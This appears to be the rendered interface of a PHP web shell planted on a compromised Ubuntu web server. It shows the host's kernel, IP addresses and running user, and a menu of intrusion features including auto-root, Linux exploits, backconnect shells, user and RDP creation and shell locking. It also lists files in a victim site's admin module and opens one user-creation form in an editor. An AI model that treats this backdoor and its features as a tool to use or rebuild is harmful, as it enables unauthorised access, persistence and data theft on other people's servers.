Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.218.3.204
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
kusdde /
adm /
admin /
html_modules /
[ HOME SHELL ]
Name
Size
Permission
Action
abcentre.html
4.9
KB
-rwxr-xr-x
admlastdate.html
6.39
KB
-rwxr-xr-x
application.html
33.13
KB
-rwxr-xr-x
application_rep.html
2.13
KB
-rwxr-xr-x
applications.html
8.02
KB
-rwxr-xr-x
apprApplications.html
12.17
KB
-rwxr-xr-x
apprApplications_30112018.html
10.28
KB
-rwxr-xr-x
apprCandidList.html
7.21
KB
-rwxr-xr-x
apprCandidates.html
7.07
KB
-rwxr-xr-x
asignApplication.html
8.9
KB
-rwxr-xr-x
changeStudyCentre.html
4.57
KB
-rwxr-xr-x
createUser.html
3.12
KB
-rwxr-xr-x
dashboard.html
6.44
KB
-rwxr-xr-x
gapstudent.html
4.88
KB
-rwxr-xr-x
idcard.html
6.05
KB
-rwxr-xr-x
updateFeeDet.html
3.95
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : createUser.html
<div class="row clearfix"> <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12"> <div class="card"> <div class="header"> <h2> Create / Update User </h2> </div> <div class="body"> <form id="createUserForm" class="form-horizontal"> <div class="row clearfix"> <div class="col-lg-2 col-md-2 col-sm-4 col-xs-5 form-control-label m_b_10"> <label class="pull-left" for="usrname">User Name</label> </div> <div class="col-sm-4 col-md-2 no_margin"> <div class="input-group m_b_10"> <div class="form-line"> <input type="text" class="form-control" id="usrname" placeholder="User Name" required> </div> </div> </div> </div> <div class="row clearfix"> <div class="col-lg-2 col-md-2 col-sm-4 col-xs-5 form-control-label m_b_10"> <label class="pull-left" class="pull-left" for="password">Password</label> </div> <div class="col-sm-4 col-md-2 no_margin"> <div class="input-group m_b_10"> <div class="form-line"> <input type="password" id="password" class="form-control" placeholder="Password" required> </div> </div> </div> </div> <div class="row clearfix"> <div class="col-lg-offset-3 col-md-offset-3 col-sm-offset-4 col-xs-offset-5"> <button type="submit" class="btn btn-primary waves-effect m-l-40" onclick = "createUser()">Create</button> </div> </div> </form> </div> </div> </div> <script type="text/javascript"> $('#createUserForm :input').focus(function(){ $(this).parent().addClass('focused')}); $('#createUserForm :input').blur(function(){ $(this).parent().removeClass('focused')}); $('form').submit(false); $('#createUserForm').validate({ highlight: function (input) { $(input).parents('.form-line').addClass('error'); }, unhighlight: function (input) { $(input).parents('.form-line').removeClass('error'); }, errorPlacement: function (error, element) { $(element).parents('.input-group').append(error); } }); $(document).ready(function () { var inputs = $('input, select').keypress(function (e) { if (e.which == 13) { e.preventDefault(); var nextInput = inputs.get(inputs.index(this) + 1); if (nextInput) { nextInput.focus(); } } }); }); </script>
Close